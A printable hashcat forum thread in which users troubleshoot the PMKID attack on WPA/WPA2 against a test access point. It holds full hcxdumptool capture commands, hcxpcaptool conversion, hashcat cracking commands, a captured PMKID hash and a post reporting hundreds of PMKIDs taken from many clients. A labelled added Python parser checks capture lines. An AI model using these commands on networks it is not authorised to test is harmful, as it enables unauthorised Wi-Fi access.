hashcat Forum
New attack on WPA/WPA2 using PMKID - Printable Version



RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-17-2018

(11-17-2018, 09:44 AM)ZerBea Wrote: Latest link is expired, so I can't download the file.
hcxdumptool attack and dump modes depend on the filter list and filter mode options. Running without these options, hcxdumptool will attack all and capture all!
If you want to attack a single access point (and you do not want to receive other traffic), add this mac to your filter list. Then use --filterlist=<your filterlist> and --filtermode=3
Usage is explained in changelog and -h (menu).

BTW:
I found another issue in big endian conversion in pcapng option fields and fixed it with the latest hcxtools commit (I hope so...). Big - little endian conversion is really ugly stuff, because I have no big endian machine here. So your pcapng files are really, really appreciated!

New link: http://www.mediafire.com/?4pb257iclbpxxi2wclw8o4j1urjwr7p
Thanks for the filter advice. I was having issues running filters, but on v5 I'll run that; maybe I had the wrong command.
Target Wifi is "shit wifi" with the password of 123456789, hopefully we got the handshake on this run.


RE: New attack on WPA/WPA2 using PMKID - ZerBea - 11-17-2018

v4.pcapng looking good:

$ hcxpcaptool -o test.hccapx -z test.16800 v4.pcapng
reading from v4.pcapng
summary:                                        
file name....................: v4.pcapng
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 5.0.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: flawless
packets inside...............: 151
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 142
beacons (with ESSID inside)..: 3
probe requests...............: 4
probe responses..............: 8
association requests.........: 3
association responses........: 5
authentications (OPEN SYSTEM): 89
authentications (BROADCOM)...: 5
EAPOL packets................: 39
EAPOL PMKIDs.................: 5
best handshakes..............: 1 (ap-less: 1)

1 handshake(s) written to test.hccapx
5 PMKID(s) written to test.16800

Inside of test.16800 is a PMKID from this network, ESSID "shit wifi", and the PSK is not 123456789!

$ whoismac -p 07b4xxxx....xxxx*e84e06xxxxxx*f0a225c4c261*736869742077696669
ESSID..: shit wifi
MAC_AP.: e84e06xxxxxx
VENDOR.: EDUP INTERNATIONAL (HK) CO., LTD
MAC_STA: f0a225c4c261
VENDOR.: Private

From the -E option of hcxpcaptool I noticed that there is also an ESSID "Shit Wifi". Unfortunately we have no handshake and no PMKID from this network.


RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-17-2018

(11-17-2018, 11:22 AM)ZerBea Wrote: v4.pcapng looking good:

Strange, well I created multiple networks with the same password as I was having issues grabbing the handshake.
When I run the conversion I get this summary:

Code:
summary:
--------
file name....................: v4.pcapng
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 5.0.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: yes
packets inside...............: 151
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 141
beacons (with ESSID inside)..: 3
probe requests...............: 4
probe responses..............: 8
association requests.........: 3
association responses........: 5
authentications (OPEN SYSTEM): 88
authentications (BROADCOM)...: 5
EAPOL packets................: 39
EAPOL PMKIDs.................: 5
best handshakes..............: 1 (ap-less: 0)

5 PMKID(s) written to v4.16800

I double-checked and the password should be 123456789; however, I could reset all the wifi and passwords to try a redump, but I'm thinking the issue is much bigger than having an incorrect password. Of course I'm probably wrong, haha.


RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-18-2018

UPDATE:

Alright, so I installed Ubuntu desktop with hcxpcaptool and performed the file conversion; this time I get "flawless". I then compared the hashes from my pineapple and it seems they are exactly the same. So the "read errors: yes" seems to be a text glitch or something. However, trying to use hashcat once again, I still can't crack it with the password of 123456789; something must be going on when creating the dump file. Have a look at this new dump if you want. I also installed a new router and triple-checked that the password was indeed 123456789.

v5 here http://www.mediafire.com/?ufraznsltbc6x6azvzza5jnip66ki8u

I'm guessing at this point it's specifically a pineapple/driver problem. I restored the pineapple and formatted the SD; I even tried older builds with no luck at all.

Also, this here is the hash:

ac20d69c3f1cf3c11309fc9f306cd9e7*e84e063b1484*fcc233ee3edd*736869742077696669

It SHOULD be 123465789, however it seems uncrackable.


RE: New attack on WPA/WPA2 using PMKID - ZerBea - 11-18-2018

I don't think it's a driver issue and I don't think it's a pineapple issue, because you received a PMKID from the access point!

1) check your environment
identify your access point (ESSID and mac)
set the PSK from the access point to 123456789
connect a client to the access point (we need this to verify that the handshakes matches to the PMKID) and use this PSK
use a fixed channel (for example: 3)

2) make sure you're using latest git of hcxtools and hcxdumptool
add the mac ap to the filter list
run hcxdumptool:
hcxdumptool -i <your interface> -o test.pcapng --filterlist=<your filterlist> --filtermode=3 -t 120 -c 3 --enable-status=1
now wait until you have received a PMKID and a handshake

3) run hcxpcaptool to convert the hashes for hashcat
hcxpcaptool -o test.hccapx -z test.16800 test.pcapng

4) check if test.16800 contains the mac of the access point
and that the mac matches to the mac within test.hccapx
wlanhcxinfo -i test.hccapx -a -e

6) add some words and the PSK 123456789 to the wordlist
first run hashcat on the handshake
hashcat -m 2500 test.hccapx wordlist
hashcat should recover the PSK
now run hashcat on the PMKID
hashcat -m 16800 test.16800 wordlist
hashcat should recover the PSK

7) upload test.pcapng to https://wpa-sec.stanev.org/?
to see if it's crackable by common wordlists
use the web interface or wlancap2wpasec
wlancap2wpasec test.pcapng
if the PSK is easy, wpa-sec should be able to retrieve the PSK:
Last 24h processed nets: 73876
Last 24h performance: 705.79K/s
Last 24h submissions: 24877
Last 24h founds: 11368
...as of today from wpa-sec stats: https://wpa-sec.stanev.org/?stats
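
Added example (not part of ZerBea's post and not hcxtools code): a small parser for the `PMKID*MAC_AP*MAC_STA*ESSID` lines of a .16800 file that performs the step 4 check, confirming each line belongs to the lab access point whose PSK was set. The target MAC and ESSID passed in, and every sample line except the first, are assumptions constructed for illustration.

```python
import re
from typing import NamedTuple

# PMKID*MAC_AP*MAC_STA*ESSID, every field hex-encoded (ESSID is 1..32 bytes).
LINE_RE = re.compile(
    r"([0-9a-f]{32})\*([0-9a-f]{12})\*([0-9a-f]{12})\*((?:[0-9a-f]{2}){1,32})"
)

class PmkidLine(NamedTuple):
    pmkid: str
    mac_ap: str
    mac_sta: str
    essid: bytes

def parse_16800(line: str) -> PmkidLine:
    """Parse one line of a .16800 file; raise ValueError if malformed."""
    m = LINE_RE.fullmatch(line.strip().lower())
    if m is None:
        raise ValueError(f"not a PMKID*MAC_AP*MAC_STA*ESSID line: {line!r}")
    return PmkidLine(m[1], m[2], m[3], bytes.fromhex(m[4]))

def check_target(lines, target_mac: str, target_essid: str):
    """Classify each line against the lab AP the PSK was set on (step 4)."""
    want_mac = re.sub(r"[:-]", "", target_mac).lower()
    want_essid = target_essid.encode("utf-8")
    verdicts = []
    for raw in lines:
        try:
            rec = parse_16800(raw)
        except ValueError:
            verdicts.append("malformed")
            continue
        if rec.mac_ap != want_mac:
            verdicts.append("other AP")
        elif rec.essid != want_essid:
            # Byte-exact compare: the ESSID feeds the WPA2-PSK key derivation,
            # so "Shit Wifi" and "shit wifi" are different networks.
            verdicts.append("ESSID differs")
        else:
            verdicts.append("target")
    return verdicts

# First line is the hash posted in this thread; the rest are constructed samples
# (the last one mimics a redacted line, which is not valid hex).
SAMPLE = [
    "ac20d69c3f1cf3c11309fc9f306cd9e7*e84e063b1484*fcc233ee3edd*736869742077696669",
    "00112233445566778899aabbccddeeff*e84e063b1484*020000000002*536869742057696669",
    "00112233445566778899aabbccddeeff*020000000001*020000000002*736869742077696669",
    "07b4xxxx....xxxx*e84e06xxxxxx*f0a225c4c261*736869742077696669",
]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE, check_target(SAMPLE, "e8:4e:06:3b:14:84", "shit wifi")):
        print(f"{verdict:14} {line}")
```

Only lines classified as "target" are worth testing against the PSK that was configured on the lab access point.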


RE: New attack on WPA/WPA2 using PMKID - dojo_mast3r - 11-18-2018

(11-18-2018, 08:26 PM)ZerBea Wrote: I don't think it's a driver issue and I don't think it's a pineapple issue, because you received a PMKID from the access point!

I downgraded my pineapple and restored everything, and I think I actually got it to crack the hash! Ugh, that was headache-inducing, haha. Thanks for all your help! Most likely I will have more errors/questions when working with this awesome project, but for now I think I got it figured out.


RE: New attack on WPA/WPA2 using PMKID - ZerBea - 11-27-2018

Due to several big endian fixes, hcxdumptool and hcxtools moved to v 5.0.1.
I received a notice that they are running on OpenWRT.
But keep in mind:
Both, PMKID attack vector and AP-LESS attack vector, are highly effective and ultra fast, if you follow the recommendation:
Raspberry PI or Notebook
Arch Linux
Supported WiFi adapter (for example: rt2800usb driver):

$ hcxpcaptool -V example.pcapng
reading from example.pcapng
summary:
file name....................: example.pcapng
file type....................: pcapng 1.0
file hardware information....: armv6l
file os information..........: Linux 4.14.83-2-ARCH
file application information.: hcxdumptool 5.0.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 22336
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
WDS packets..................: 53
beacons (with ESSID inside)..: 4006
probe requests...............: 758
probe responses..............: 1581
association requests.........: 376
association responses........: 635
reassociation requests.......: 91
reassociation responses......: 167
authentications (OPEN SYSTEM): 7956
authentications (BROADCOM)...: 7919
authentications (SONOS)......: 23
authentications (APPLE)......: 7
authentications (NETGEAR)....: 1
EAPOL packets................: 6399
EAPOL PMKIDs.................: 754
EAP packets..................: 126
found........................: EAP type ID
best handshakes..............: 252 (ap-less: 124)


754 PMKIDs (different CLIENTs)!
128 handshakes from AP-CLIENT (different CLIENTs)!
124 handshakes AP-LESS (different CLIENTs)!


RE: New attack on WPA/WPA2 using PMKID - Calyptorhynchus - 01-10-2019

<3<3<3<3<3<3<3<3<3<3<3!!!!!